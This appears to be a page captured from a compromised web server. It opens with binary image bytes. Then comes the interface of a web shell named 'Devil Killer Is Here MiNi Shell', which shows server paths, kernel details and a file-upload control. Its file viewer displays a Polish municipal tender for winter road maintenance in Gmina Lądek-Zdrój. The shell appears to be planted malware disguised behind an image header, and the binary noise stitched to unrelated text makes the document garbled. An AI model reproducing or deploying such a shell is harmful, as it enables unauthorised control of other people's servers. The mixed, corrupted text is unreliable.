JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251113/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251113/0053075901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg (ZUD) gminnych publicznych i wewnętrznych na terenie wiejskim Gminy Lądek – Zdrój </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LĄDEK-ZDRÓJ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Inwestycji i Rozwoju</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890718113</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lądek-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">57-540</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ladek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ladek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg (ZUD) gminnych publicznych i wewnętrznych na terenie wiejskim Gminy Lądek – Zdrój </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3e0deac8-466a-42e4-bcfe-3a40434b1eef</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00530759</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00080966/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Zimowe otrzymanie dróg (ZUD) gminnych publicznych i wewnętrznych na terenie wiejskim Gminy Lądek-Zdrój</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1214217 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1214217</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zawiera ROZDZ. VIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzule związane z ochroną danych osobowych zawiera Rozdz. XXV SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzule związane z ochroną danych osobowych zawiera Rozdz. XXV SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WR.271.34.2025.206</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Rejon I: Trzebieszowice cz. 1: od kościoła w stronę Kłodzka<br/>1.	granica rejonu: granice rejonu wyznaczają drogi:<br/>•	droga nr 119840 odcinek od skrzyżowania z DP3258 do Skrzynki do dz. nr 91 (do kościoła)<br/>•	drogi nr 91 (przy SzP), nr 83 do mostu stalowego i droga nr 61/2 do DP3258<br/>•	droga nr 687 od mostu stalowego do DW392<br/>2.	dalej w dół wsi w kierunku Kłodzka obejmuje drogi: część lewobrzeżna:<br/>•	dz. 721/8 do zabudowań na dz. 721/9<br/>•	dz. 725 do budynku tartaku<br/>•	dz. 681/6 do zabudowań przy szeregu domków jednorodzinnych do dz. nr 681/8<br/>•	dz. 671 od DW392 do zabudowań na dz. 669<br/>•	dz. 661 od DW392 do zabudowań na dz. 663<br/>•	dz. 659/6 od DW392 do zabudowań na dz. 659/3<br/>•	dz. 666/2 od DW392 (przed głównym mostem) do zabudowań dz. 665<br/>•	dz. 755 od DP3228 do zabudowań na dz. 759<br/>•	dz. 757 i 766 do zabudowań przed torami<br/>•	dz. 770 do zabudowań na dz. 772/7<br/>•	dz. 853, 860 od DP3228 do zabudowań na dz. 870/16<br/>•	dz. 858/2 od drogi nr 860 do zabudowań na dz. 858/3<br/>•	dz. 857 od drogi 860 do kładki (tymczasowo wyłączona)<br/>•	dz. 718 od DW392 do stacji PKP i zabudowań na terenie stacji<br/>•	dz. 177 od DP3258 i droga nr 176/3 do zabudowań na dz. 176/1, 176/5 i 176/2<br/>•	dz. 57/7 od DP3258 do zabudowań na dz. 57/2<br/>•	dz. 55 od DP3258 do zabudowań na dz. 175/2<br/>•	dz. 45/1 od DW392 do zabudowań na dz. 77<br/>•	dz. 51/2 od DW392 i dalej drogą 45/3 do skrzyżowania z DW392 przy byłej bazie Z.R.B.<br/>•	dz. 34 od DW392 do zabudowań na dz. 31<br/>•	dz. 38 od DW392 do zabudowań nr 80 i 82<br/>•	dz. 4 od DW392 do zabudowań nr 88A<br/><br/>Zakres prac oraz zasady ZUD<br/>•	Czynności zimowego utrzymania dróg wykonywane będą w okresie 01.12.2025r. do 31.03.2026r. Zamawiający informuje, że czas trwania umowy może ulec zmianie ze względu na warunki atmosferyczne; <br/>•	Czynności związane z zimowym utrzymaniem dróg powinny być wykonywane w sposób gwarantujący osiągnięcie i utrzymanie właściwych standardów, przy spełnieniu wymagań dotyczących ochrony środowiska, bezpieczeństwa i higieny pracy, standardów sanitarnych oraz wymagań wynikających z innych obowiązujących przepisów.<br/>Wykonawca obowiązany jest:<br/>•	Prowadzić odpowiednią dokumentację wykonywanych usług – raport pracy sprzętu, określającą terminy (daty i czas), organizować prace związane z przedmiotem umowy w sposób umożliwiający należyte wykonanie usługi i bez zakłóceń w ruch drogowym;<br/>•	Stosować się do zaleceń Zamawiającego związanych z realizacją przedmiotu umowy.<br/>Wykonawca ponosi pełną odpowiedzialność za wykonywane usługi wynikające z realizacji zamówienia oraz zobowiązuje się pokryć wszelkie szkody osób trzecich wynikłe z niewykonania lub nienależytego wykonania powierzonych mu czynności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>a)	Cena (C) – 60 % <br/>b)	Czas reakcji (R) – 40%<br/>1.1. Kryterium Cena (C) - oferta z najniższą ceną za realizację przedmiotu zamówienia otrzyma maksymalną liczbę 60 punktów, natomiast pozostałe oferty uzyskają wartość punktową wyliczoną wg poniższego wzoru:<br/>C= Cmin / Cb x 60 = … pkt<br/>C - liczba punktów w kryterium Cena <br/>Cmin - najniższa cena ofertowa w zbiorze ofert podlegających ocenie<br/>Cb - cena ofertowa ocenianej oferty<br/>1.2.	Kryterium Czas reakcji (R) – ocena w tym kryterium polega na przyznaniu ofercie Wykonawcy dodatkowych punktów za zaoferowany krótszego czasu reakcji na zgłoszenie Zamawiającego. Czas reakcji należy rozumieć jako wyrażony w minutach maksymalny okres czasu jaki może upłynąć od chwili wydania przez Zamawiającego dyspozycji realizacji usług Zimowego Utrzymania Dróg w danym regionie, a rozpoczęciem wykonywania tych usług przez Wykonawcę. W tym kryterium, Zamawiający przyzna Wykonawcy dodatkowe punkty (max. 40 pkt), wg następującego wzoru: <br/>R = (Rmax – Rb) / (Rmax – Rmin) x 40 =… pkt<br/>R - ilość przyznanych pkt w ramach kryterium<br/>Rb- czas podstawienia pojazdu w badanej ofercie w minutach<br/>Rmin.- minimalny czas podstawienia pojazdu określony w minutach <br/>Rmax. – maksymalny czas podstawienia pojazdu określony w minutach<br/>Minimalny czas reakcji wynosi 30 minut, a maksymalny 90 minut. <br/>Oferowany czas reakcji Wykonawca zobowiązany jest zamieścić w ofercie (wzór - Załącznik nr 1 do SWZ). <br/>UWAGA: Oferta zawierająca czas reakcji dłuższy niż maksymalny tj. 90 minut– oferta będzie podlegała odrzuceniu. W przypadku braku podania oferowanego czasu reakcji, Zamawiający uzna, że Wykonawca zaoferował maksymalny czas wynoszący 90 minut i otrzyma 0 punktów. W przypadku zaoferowanie czasu reakcji krótszego niż minimalny 30 min Wykonawca nie otrzyma dodatkowych punktów, natomiast do umowy zostanie wpisany czas zaoferowany przez Wykonawcę.<br/>2.	Za najkorzystniejszą ofertę uznana zostanie ta, która uzyska w sumie największą liczbę punktów w oparciu o przyjęte kryteria oceny ofert (C+R).<br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas Reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Rejon II: Trzebieszowice cz. 2: od kościoła w stronę Lądka-Zdroju<br/>1.	Trzebieszowice:<br/>•	dz. 426/5 i 426/4 stary odcinek drogi wojewódzkiej od DW392 do DW392<br/>•	dz. 401/2; 407 i 354 od DW 392 do DW 392<br/>•	dz. 345/1 od dr. 354 do dz. 696<br/>•	dz. 696,703/1,703/2 oraz działka 702<br/>•	dz. 423 do zabudowań na dz. 425/3<br/>•	dz. 339 od DW392 do zabudowań na dz. 338/2<br/>2.	część prawobrzeżna:<br/>•	dz. 119841 od DW 392 (stary odcinek) do DG119840<br/>•	dz. 284 od DG119841 do zabudowań na dz. 260/3<br/>•	dz. 256 od DG119841 do zabudowań na dz. 251<br/>•	dz. 235 od DG119841 do zabudowań na dz. 236/2<br/>•	dz. 317 droga do zabudowań na dz. nr 219/1 (bud. nr 162)<br/>•	dz. 212 od DG119840 do zabudowań na dz.210/2<br/>•	dz. 189 od DG119840 do zabudowań na dz. 194/10 do skrzyżowania z dr. 212<br/>•	DG nr 119840 od mostu stalowego do dr nr 91 do kościoła<br/>•	droga nr 333 od DW 392 do zabudowań na dz. 331/1<br/>•	dz. 436/1 (do budynku nr 23)<br/>•	dz. 504/6 i 471 (do budynku nr 13 )<br/>•	dz. 426/3,426/5 (stary odcinek DW 392) do bud. nr 3, 5, 11, 17<br/>•	dz. 504/3 od drogi nr 426/3 i 426/5 do DW392<br/>•	dz. 535 i 531 od drogi nr 426/3 i 426/5 do drogi gminnej w Radochowie<br/>•	dz. 501 od mostu przy zakładzie rybackim do Trzebieszowice + drogi nr 535 i 531 w Trzebieszowicach<br/>•	dz. 119844 od skrzyżowania z DP3253 do DW392<br/><br/>Zakres prac oraz zasady ZUD<br/>•	Czynności zimowego utrzymania dróg wykonywane będą w okresie 01.12.2025r. do 31.03.2026r. Zamawiający informuje, że czas trwania umowy może ulec zmianie ze względu na warunki atmosferyczne; <br/>•	Czynności związane z zimowym utrzymaniem dróg powinny być wykonywane w sposób gwarantujący osiągnięcie i utrzymanie właściwych standardów, przy spełnieniu wymagań dotyczących ochrony środowiska, bezpieczeństwa i higieny pracy, standardów sanitarnych oraz wymagań wynikających z innych obowiązujących przepisów.<br/>Wykonawca obowiązany jest:<br/>•	Prowadzić odpowiednią dokumentację wykonywanych usług – raport pracy sprzętu, określającą terminy (daty i czas), organizować prace związane z przedmiotem umowy w sposób umożliwiający należyte wykonanie usługi i bez zakłóceń w ruch drogowym;<br/>•	Stosować się do zaleceń Zamawiającego związanych z realizacją przedmiotu umowy.<br/>Wykonawca ponosi pełną odpowiedzialność za wykonywane usługi wynikające z realizacji zamówienia oraz zobowiązuje się pokryć wszelkie szkody osób trzecich wynikłe z niewykonania lub nienależytego wykonania powierzonych mu czynności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>a)	Cena (C) – 60 % <br/>b)	Czas reakcji (R) – 40%<br/>1.1. Kryterium Cena (C) - oferta z najniższą ceną za realizację przedmiotu zamówienia otrzyma maksymalną liczbę 60 punktów, natomiast pozostałe oferty uzyskają wartość punktową wyliczoną wg poniższego wzoru:<br/>C= Cmin / Cb x 60 = … pkt<br/>C - liczba punktów w kryterium Cena <br/>Cmin - najniższa cena ofertowa w zbiorze ofert podlegających ocenie<br/>Cb - cena ofertowa ocenianej oferty<br/>1.2.	Kryterium Czas reakcji (R) – ocena w tym kryterium polega na przyznaniu ofercie Wykonawcy dodatkowych punktów za zaoferowany krótszego czasu reakcji na zgłoszenie Zamawiającego. Czas reakcji należy rozumieć jako wyrażony w minutach maksymalny okres czasu jaki może upłynąć od chwili wydania przez Zamawiającego dyspozycji realizacji usług Zimowego Utrzymania Dróg w danym regionie, a rozpoczęciem wykonywania tych usług przez Wykonawcę. W tym kryterium, Zamawiający przyzna Wykonawcy dodatkowe punkty (max. 40 pkt), wg następującego wzoru: <br/>R = (Rmax – Rb) / (Rmax – Rmin) x 40 =… pkt<br/>R - ilość przyznanych pkt w ramach kryterium<br/>Rb- czas podstawienia pojazdu w badanej ofercie w minutach<br/>Rmin.- minimalny czas podstawienia pojazdu określony w minutach <br/>Rmax. – maksymalny czas podstawienia pojazdu określony w minutach<br/>Minimalny czas reakcji wynosi 30 minut, a maksymalny 90 minut. <br/>Oferowany czas reakcji Wykonawca zobowiązany jest zamieścić w ofercie (wzór - Załącznik nr 1 do SWZ). <br/>UWAGA: Oferta zawierająca czas reakcji dłuższy niż maksymalny tj. 90 minut– oferta będzie podlegała odrzuceniu. W przypadku braku podania oferowanego czasu reakcji, Zamawiający uzna, że Wykonawca zaoferował maksymalny czas wynoszący 90 minut i otrzyma 0 punktów. W przypadku zaoferowanie czasu reakcji krótszego niż minimalny 30 min Wykonawca nie otrzyma dodatkowych punktów, natomiast do umowy zostanie wpisany czas zaoferowany przez Wykonawcę.<br/>2.	Za najkorzystniejszą ofertę uznana zostanie ta, która uzyska w sumie największą liczbę punktów w oparciu o przyjęte kryteria oceny ofert (C+R).<br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas Reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Rejon III: Radochów, Kąty Bystrzyckie<br/>1.	Radochów<br/>•	DG 119843 od skrzyżowania z DP3253 do DG119832 (ul. Wiejskiej)<br/>•	dz. 365 od DG119844 (przy zakładzie rybackim) do działki nr 405 <br/>•	dz. 372 od DG119844 do drogi nr 401<br/>•	dz. 401 od drogi nr 365 do drogi nr 405<br/>•	dz. 405 od drogi nr 365 do zabudowań 10A oraz odcinek z drugiej strony od DG119844 do zabudowań Radochów 25<br/>•	dz. 391 od DG119844 do drogi nr dz. 372<br/>•	dz. 429,431 oraz 425/6 od DP3252 do zabud. 137,138N,150E<br/>•	dz. 433/1 od DP3252 do ostatnich zabudowań 138K<br/>•	dz. 455 i 458 od drogi 392 do DP3252<br/>•	dz. 240 do zabudowań na dz. nr 243/10<br/>•	dz. 248 od DP3253 do wys. Cmentarza powyżej zabud. 114<br/>•	dz. 270,271,272 od DP3253 do kościoła nr. 113<br/>•	dz. 290 od DP3253 do zameczku nr. 119<br/>•	dz. 201 od DP3253 do remizy dz. 201 <br/>•	dz. 320 do zabudowań nr 1320 (dz. nr 319/4)<br/>•	dz. 422 do budynku nr 136a<br/>•	dz. 404 do wys. budynku 9a<br/>•	dz. 147 do wysokości działki 148<br/>•	dz. 134 do budynku 50<br/>•	dz. 131 wjazd do budynku 54<br/>•	dz. 129 do budynku 55<br/>•	dz. 120 do wjazd pomiędzy 65 i 64<br/>•	dz. 404 do wys. budynku 9a<br/>•	dz. 59 do budynku 78<br/>2.	Kąty Bystrzyckie<br/>•	dz. 40 do zabudowań na dz. nr 48<br/>•	dz. 173 od drogi powiatowej do drogi powiatowej<br/>•	dz. 68/2 od kościoła do granicy lasu<br/>•	dz. 47 od dz.40 do granicy lasu<br/><br/><br/>Zakres prac oraz zasady ZUD<br/>•	Czynności zimowego utrzymania dróg wykonywane będą w okresie 01.12.2025r. do 31.03.2026r. Zamawiający informuje, że czas trwania umowy może ulec zmianie ze względu na warunki atmosferyczne; <br/>•	Czynności związane z zimowym utrzymaniem dróg powinny być wykonywane w sposób gwarantujący osiągnięcie i utrzymanie właściwych standardów, przy spełnieniu wymagań dotyczących ochrony środowiska, bezpieczeństwa i higieny pracy, standardów sanitarnych oraz wymagań wynikających z innych obowiązujących przepisów.<br/>Wykonawca obowiązany 